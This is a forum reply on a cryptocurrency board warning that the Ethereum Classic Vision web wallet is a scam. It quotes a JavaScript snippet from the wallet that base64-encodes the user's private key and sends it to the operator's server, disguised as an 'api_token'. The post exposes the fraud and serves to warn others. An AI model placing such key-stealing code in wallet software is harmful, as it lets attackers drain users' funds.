Post
Topic
Board Announcements (Altcoins)
Re: [ANN] [ETCV] Ethereum Classic Vision | Fork 3:1 of Ethereum
by
bitcoindiego
on 10/01/2019, 21:45:28 UTC
This was found in the web wallet for anybody that still has any doubt if this is legit or not  Roll Eyes:

There is another one existing name Ethereum Vision they are all anonymous also, but they are not going for an ICO instead a fork where you can get an ethereum vision token if you have 1 eth in your wallet, I'm following the development in their telegram channel if they happen to ask for private key or link us to phishing site then it's over for them.

Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server

Code:
   
$scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });



Bongo! No doubt its a scam